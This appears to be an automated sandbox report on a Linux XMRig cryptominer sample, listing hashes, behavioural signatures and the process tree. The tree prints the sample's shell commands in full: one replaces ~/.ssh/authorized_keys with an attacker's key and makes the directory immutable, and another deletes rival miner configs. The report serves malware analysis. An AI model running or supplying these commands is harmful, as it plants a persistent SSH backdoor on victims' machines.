Analysis
- max time kernel: 149s
- max time network: 151s
- platform: ubuntu-22.04_amd64
- resource: ubuntu2204-amd64-20240611-en
- resource tags: arch:amd64, arch:i386, image:ubuntu2204-amd64-20240611-en, kernel:5.15.0-105-generic, locale:en-us, os:ubuntu-22.04-amd64, system
- submitted: 03-11-2024 20:37
General
- Target: 7a5c9606d068a16565c65aa8c5ee11ccecdc7098b91023dcfdb0c78695af4574
- Size: 2.1MB
- MD5: 1c36e8aaac825bcb9a086ecf2a471c89
- SHA1: 66cb901aadae8db4511a364024d555427d78d3f9
- SHA256: 7a5c9606d068a16565c65aa8c5ee11ccecdc7098b91023dcfdb0c78695af4574
- SHA512: 8a65ee52874ec24b4dda49e63153aec981bd310c49245f5d26592824a1ad0da52c7233c31e7a380ba1fe9aeff6f453db1345686eceafb8b6dfd80f9eef25dda1
- SSDEEP: 49152:WWD683TqbMtemJOGmHBox1Q6jtSVVO7EHsq8:J6dM3OGUCoPVs7EH8
Malware Config
Signatures
- Xmrig family
- Xmrig_linux family
- xmrig
  XMRig is a high-performance, open-source, cross-platform CPU/GPU miner.
- XMRig Miner payload (1 IoCs)
  Processes:
  - resource: behavioral1/memory/1592-1-0x0000000000400000-0x0000000000a65ff8-memory.dmp
    yara_rule: xmrig
Attempts to change immutable files (6 IoCs)
Modifies inode attributes on the filesystem to allow changing of immutable files.
Processes (pid / Process):
- 1599 chattr
- 1600 chattr
- 1601 sh
- 1602 sh
- 1603 chattr
- 1605 chattr
Checks hardware identifiers (DMI) (1 TTPs, 4 IoCs)
Checks DMI information which indicates whether the system is a virtual machine.
Processes (description / ioc), all by Process 7a5c9606d068a16565c65aa8c5ee11ccecdc7098b91023dcfdb0c78695af4574:
- File opened for reading: /sys/devices/virtual/dmi/id/product_name
- File opened for reading: /sys/devices/virtual/dmi/id/board_vendor
- File opened for reading: /sys/devices/virtual/dmi/id/bios_vendor
- File opened for reading: /sys/devices/virtual/dmi/id/sys_vendor
Enumerates running processes
Discovers information about currently running processes on the system.
Reads hardware information (1 TTPs, 14 IoCs)
Accesses system information such as serial numbers and manufacturer names.
Processes (description / ioc), all by Process 7a5c9606d068a16565c65aa8c5ee11ccecdc7098b91023dcfdb0c78695af4574:
- File opened for reading: /sys/devices/virtual/dmi/id/product_serial
- File opened for reading: /sys/devices/virtual/dmi/id/chassis_serial
- File opened for reading: /sys/devices/virtual/dmi/id/board_name
- File opened for reading: /sys/devices/virtual/dmi/id/board_serial
- File opened for reading: /sys/devices/virtual/dmi/id/chassis_asset_tag
- File opened for reading: /sys/devices/virtual/dmi/id/bios_version
- File opened for reading: /sys/devices/virtual/dmi/id/product_uuid
- File opened for reading: /sys/devices/virtual/dmi/id/board_version
- File opened for reading: /sys/devices/virtual/dmi/id/chassis_version
- File opened for reading: /sys/devices/virtual/dmi/id/bios_date
- File opened for reading: /sys/devices/virtual/dmi/id/product_version
- File opened for reading: /sys/devices/virtual/dmi/id/board_asset_tag
- File opened for reading: /sys/devices/virtual/dmi/id/chassis_vendor
- File opened for reading: /sys/devices/virtual/dmi/id/chassis_type
Processes:
- resource: behavioral1/files/fstream-1.dat
  yara_rule: upx
Changes its process name (2 IoCs)
Processes (description / ioc / pid), all by Process 7a5c9606d068a16565c65aa8c5ee11ccecdc7098b91023dcfdb0c78695af4574:
- Changes the process name, possibly in an attempt to hide itself: kauditd0 (pid 1592)
- Changes the process name, possibly in an attempt to hide itself: sshd@notty (pid 1596)
Checks CPU configuration (1 TTPs, 1 IoCs)
Checks CPU information which indicates whether the system is a virtual machine.
Processes (description / ioc), by Process 7a5c9606d068a16565c65aa8c5ee11ccecdc7098b91023dcfdb0c78695af4574:
- File opened for reading: /proc/cpuinfo
Reads CPU attributes (1 TTPs, 45 IoCs)
Processes (description / ioc), all by Process 7a5c9606d068a16565c65aa8c5ee11ccecdc7098b91023dcfdb0c78695af4574:
- File opened for reading: /sys/devices/system/cpu/cpu0/topology/cluster_cpus
- File opened for reading: /sys/devices/system/cpu/cpu0/cache/index1/level
- File opened for reading: /sys/devices/system/cpu/cpu0/cache/index3/level
- File opened for reading: /sys/devices/system/cpu/cpu0/cache/index9/shared_cpu_map
- File opened for reading: /sys/devices/system/cpu/cpu0/cache/index8/shared_cpu_map
- File opened for reading: /sys/devices/system/cpu/cpu0/topology/core_cpus
- File opened for reading: /sys/devices/system/cpu/cpu0/topology/die_cpus
- File opened for reading: /sys/devices/system/cpu/cpu0/cache/index1/type
- File opened for reading: /sys/devices/system/cpu/cpu0/cache/index2/type
- File opened for reading: /sys/devices/system/cpu/cpu0/cache/index3/coherency_line_size
- File opened for reading: /sys/devices/system/cpu/cpu0/cache/index4/shared_cpu_map
- File opened for reading: /sys/devices/system/cpu/cpu0/topology/physical_package_id
- File opened for reading: /sys/devices/system/cpu/cpu0/cache/index0/shared_cpu_map
- File opened for reading: /sys/devices/system/cpu/cpu0/cache/index0/id
- File opened for reading: /sys/devices/system/cpu/cpu0/cache/index0/physical_line_partition
- File opened for reading: /sys/devices/system/cpu/cpu0/cache/index2/shared_cpu_map
- File opened for reading: /sys/devices/system/cpu/cpu0/cache/index3/number_of_sets
- File opened for reading: /sys/devices/system/cpu/online
- File opened for reading: /sys/devices/system/cpu/cpu0/cache/index0/type
- File opened for reading: /sys/devices/system/cpu/cpu0/cache/index2/physical_line_partition
- File opened for reading: /sys/devices/system/cpu/cpu0/cache/index3/size
- File opened for reading: /sys/devices/system/cpu/cpu0/cache/index7/shared_cpu_map
- File opened for reading: /sys/devices/system/cpu/cpu0/cpufreq/cpuinfo_max_freq
- File opened for reading: /sys/devices/system/cpu/possible
- File opened for reading: /sys/devices/system/cpu/cpu0/topology/package_cpus
- File opened for reading: /sys/devices/system/cpu/cpu0/cache/index0/size
- File opened for reading: /sys/devices/system/cpu/cpu0/cache/index0/number_of_sets
- File opened for reading: /sys/devices/system/cpu/cpu0/cache/index1/id
- File opened for reading: /sys/devices/system/cpu/cpu0/cache/index2/id
- File opened for reading: /sys/devices/system/cpu/cpu0/cache/index3/id
- File opened for reading: /sys/devices/system/cpu/cpu0/cache/index0/level
- File opened for reading: /sys/devices/system/cpu/cpu0/cache/index1/shared_cpu_map
- File opened for reading: /sys/devices/system/cpu/cpu0/cache/index2/level
- File opened for reading: /sys/devices/system/cpu/cpu0/cache/index3/shared_cpu_map
- File opened for reading: /sys/devices/system/cpu/cpu0/cache/index3/physical_line_partition
- File opened for reading: /sys/devices/system/cpu/cpu0/cache/index6/shared_cpu_map
- File opened for reading: /sys/devices/system/cpu/cpu0/cache/index0/coherency_line_size
- File opened for reading: /sys/devices/system/cpu/cpu0/cache/index2/coherency_line_size
- File opened for reading: /sys/devices/system/cpu/cpu0/cache/index3/type
- File opened for reading: /sys/devices/system/cpu/cpu0/cache/index5/shared_cpu_map
- File opened for reading: /sys/devices/system/cpu/cpu0/cpu_capacity
- File opened for reading: /sys/devices/system/cpu/cpu0/topology/core_id
- File opened for reading: /sys/devices/system/cpu/cpu0/cache/index2/size
- File opened for reading: /sys/devices/system/cpu/cpu0/cache/index2/number_of_sets
- File opened for reading: /sys/devices/system/cpu/cpu0/cpufreq/base_frequency
Enumerates kernel/hardware configuration (1 TTPs, 24 IoCs)
Reads contents of /sys virtual filesystem to enumerate system information.
Processes (description / ioc), all by Process 7a5c9606d068a16565c65aa8c5ee11ccecdc7098b91023dcfdb0c78695af4574:
- File opened for reading: /sys/devices/system/node/node0/access0/initiators/read_latency
- File opened for reading: /sys/firmware/dmi/tables/smbios_entry_point
- File opened for reading: /sys/devices/system/node/node0/hugepages/hugepages-2048kB/free_hugepages
- File opened for reading: /sys/fs/cgroup/cgroup.controllers
- File opened for reading: /sys/kernel/mm/hugepages/hugepages-1048576kB/nr_hugepages
- File opened for reading: /sys/devices/system/node/node0/hugepages/hugepages-2048kB/nr_hugepages
- File opened for reading: /sys/devices/system/node/node0/access1/initiators
- File opened for reading: /sys/devices/system/node/node0/access0/initiators
- File opened for reading: /sys/devices/system/node/node0/access0/initiators/read_bandwidth
- File opened for reading: /sys/firmware/dmi/tables/DMI
- File opened for reading: /sys/kernel/mm/hugepages
- File opened for reading: /sys/devices/system/node/node0/cpumap
- File opened for reading: /sys/bus/dax/devices
- File opened for reading: /sys/devices/system/node/node0/hugepages/hugepages-1048576kB/nr_hugepages
- File opened for reading: /sys/devices/system/node/node0/access0/initiators/write_latency
- File opened for reading: /sys/kernel/mm/hugepages/hugepages-2048kB/nr_hugepages
- File opened for reading: /sys/devices/system/node/online
- File opened for reading: /sys/devices/system/node/node0/meminfo
- File opened for reading: /sys/devices/system/node/node0/hugepages
- File opened for reading: /sys/devices/system/node/node0/access0/initiators/write_bandwidth
- File opened for reading: /sys/fs/cgroup/cpuset.cpus.effective
- File opened for reading: /sys/fs/cgroup/cpuset.mems.effective
- File opened for reading: /sys/devices/system/cpu
- File opened for reading: /sys/devices/virtual/dmi/id
Processes (description / ioc), all by Process 7a5c9606d068a16565c65aa8c5ee11ccecdc7098b91023dcfdb0c78695af4574:
- File opened for reading: /proc/1198/cmdline
- File opened for reading: /proc/1404/cmdline
- File opened for reading: /proc/1527/cmdline
- File opened for reading: /proc/10/cmdline
- File opened for reading: /proc/109/cmdline
- File opened for reading: /proc/215/cmdline
- File opened for reading: /proc/744/cmdline
- File opened for reading: /proc/311/cmdline
- File opened for reading: /proc/605/cmdline
- File opened for reading: /proc/752/cmdline
- File opened for reading: /proc/776/cmdline
- File opened for reading: /proc/mounts
- File opened for reading: /proc/6/cmdline
- File opened for reading: /proc/17/cmdline
- File opened for reading: /proc/97/cmdline
- File opened for reading: /proc/979/cmdline
- File opened for reading: /proc/986/cmdline
- File opened for reading: /proc/1418/cmdline
- File opened for reading: /proc/26/cmdline
- File opened for reading: /proc/1580/cmdline
- File opened for reading: /proc/1582/cmdline
- File opened for reading: /proc/sys/vm/nr_hugepages
- File opened for reading: /proc/11/cmdline
- File opened for reading: /proc/74/cmdline
- File opened for reading: /proc/214/cmdline
- File opened for reading: /proc/644/cmdline
- File opened for reading: /proc/1457/cmdline
- File opened for reading: /proc/18/cmdline
- File opened for reading: /proc/590/cmdline
- File opened for reading: /proc/837/cmdline
- File opened for reading: /proc/1156/cmdline
- File opened for reading: /proc/308/cmdline
- File opened for reading: /proc/1284/cmdline
- File opened for reading: /proc/1080/cmdline
- File opened for reading: /proc/1620/cmdline
- File opened for reading: /proc/213/cmdline
- File opened for reading: /proc/222/cmdline
- File opened for reading: /proc/408/cmdline
- File opened for reading: /proc/589/cmdline
- File opened for reading: /proc/1396/cmdline
- File opened for reading: /proc/497/cmdline
- File opened for reading: /proc/628/cmdline
- File opened for reading: /proc/766/cmdline
- File opened for reading: /proc/1085/cmdline
- File opened for reading: /proc/602/cmdline
- File opened for reading: /proc/1101/cmdline
- File opened for reading: /proc/1120/cmdline
- File opened for reading: /proc/1194/cmdline
- File opened for reading: /proc/217/cmdline
- File opened for reading: /proc/220/cmdline
- File opened for reading: /proc/223/cmdline
- File opened for reading: /proc/582/cmdline
- File opened for reading: /proc/1306/cmdline
- File opened for reading: /proc/216/cmdline
- File opened for reading: /proc/221/cmdline
- File opened for reading: /proc/409/cmdline
- File opened for reading: /proc/1127/cmdline
- File opened for reading: /proc/523/cmdline
- File opened for reading: /proc/771/cmdline
- File opened for reading: /proc/1027/cmdline
- File opened for reading: /proc/1032/cmdline
- File opened for reading: /proc/12/cmdline
- File opened for reading: /proc/24/cmdline
- File opened for reading: /proc/98/cmdline
Writes file to tmp directory (3 IoCs)
Malware often drops required files in the /tmp directory.
Processes (description / ioc), all by Process 7a5c9606d068a16565c65aa8c5ee11ccecdc7098b91023dcfdb0c78695af4574:
- File opened for modification: /tmp/.kswapd00
- File opened for modification: /tmp/cert_key.pem
- File opened for modification: /tmp/cert.pem
Processes
- /tmp/7a5c9606d068a16565c65aa8c5ee11ccecdc7098b91023dcfdb0c78695af4574 (PID 1592)
  Command: /tmp/7a5c9606d068a16565c65aa8c5ee11ccecdc7098b91023dcfdb0c78695af4574
  Signatures:
  - Checks hardware identifiers (DMI)
  - Reads hardware information
  - Changes its process name
  - Checks CPU configuration
  - Reads CPU attributes
  - Enumerates kernel/hardware configuration
  - Reads runtime system information
  - Writes file to tmp directory
  - /bin/sh (PID 1597)
    Command: sh -c "sh -c 'chattr -ia ~/.ssh; cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~; chattr +ia ~/.ssh' >> /dev/null 2>&1"
    - /usr/bin/sh (PID 1598)
      Command: sh -c "chattr -ia ~/.ssh; cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~; chattr +ia ~/.ssh"
      - /usr/bin/chattr (PID 1599)
        Command: chattr -ia "~/.ssh"
        Signatures:
        - Attempts to change immutable files
      - /usr/bin/chattr (PID 1600)
        Command: chattr +ia "~/.ssh"
        Signatures:
        - Attempts to change immutable files
  - /bin/sh (PID 1601)
    Command: sh -c "sh -c 'chattr -ia ~/.xmrig.json;lockr -ia ~/.xmrig.json; rm -rf ~/.xmrig.json; chattr -ia ~/.config/xmrig.json; lockr -ia ~/.config/xmrig.json; rm -rf ~/.config/xmrig.json' >>/dev/null 2>&1"
    Signatures:
    - Attempts to change immutable files
    - /usr/bin/sh (PID 1602)
      Command: sh -c "chattr -ia ~/.xmrig.json;lockr -ia ~/.xmrig.json; rm -rf ~/.xmrig.json; chattr -ia ~/.config/xmrig.json; lockr -ia ~/.config/xmrig.json; rm -rf ~/.config/xmrig.json"
      Signatures:
      - Attempts to change immutable files
      - /usr/bin/chattr (PID 1603)
        Command: chattr -ia "~/.xmrig.json"
        Signatures:
        - Attempts to change immutable files
      - /usr/bin/rm (PID 1604)
        Command: rm -rf "~/.xmrig.json"
      - /usr/bin/chattr (PID 1605)
        Command: chattr -ia "~/.config/xmrig.json"
        Signatures:
        - Attempts to change immutable files
      - /usr/bin/rm (PID 1606)
        Command: rm -rf "~/.config/xmrig.json"
Network
MITRE ATT&CK Enterprise v15
Downloads
- Filesize: 1KB
  MD5: 0b151af7e825dd40f68738ad7bcd2354
  SHA1: 954550d2b110c7c569bb270c00f2f65a2edaaa86
  SHA256: 1c1d89ef53fbad35266e9c197c0d009f55530ca90e80ebca7ef0ae5802824ff3
  SHA512: 051bee04373007683f7fdd758f648fb5f19acd1f84b2cbd9baf470f8645c8b58cb54e14d3bd2062169583801297772b370b1b3805bbead52ff9efac559677bbf
- Filesize: 2.1MB
  MD5: 1c36e8aaac825bcb9a086ecf2a471c89
  SHA1: 66cb901aadae8db4511a364024d555427d78d3f9
  SHA256: 7a5c9606d068a16565c65aa8c5ee11ccecdc7098b91023dcfdb0c78695af4574
  SHA512: 8a65ee52874ec24b4dda49e63153aec981bd310c49245f5d26592824a1ad0da52c7233c31e7a380ba1fe9aeff6f453db1345686eceafb8b6dfd80f9eef25dda1
- Filesize: 5B
  MD5: f04818cf834a1e3bd2c4325e4c8dff32
  SHA1: 13901419c5f00d545d998312ec748fc7517d2530
  SHA256: a0105311c47cdc36086fb89f65704198e5b64961c2057c6d8cbf7c70d6816bac
  SHA512: efb1697afb0ef9c209415030e8d95d92ca607aecca06585c99acd3fd63ad95028fc7c47d49d59dbd1a2ce8bca2f14788131ace82193c8565fd2f9362d22813c9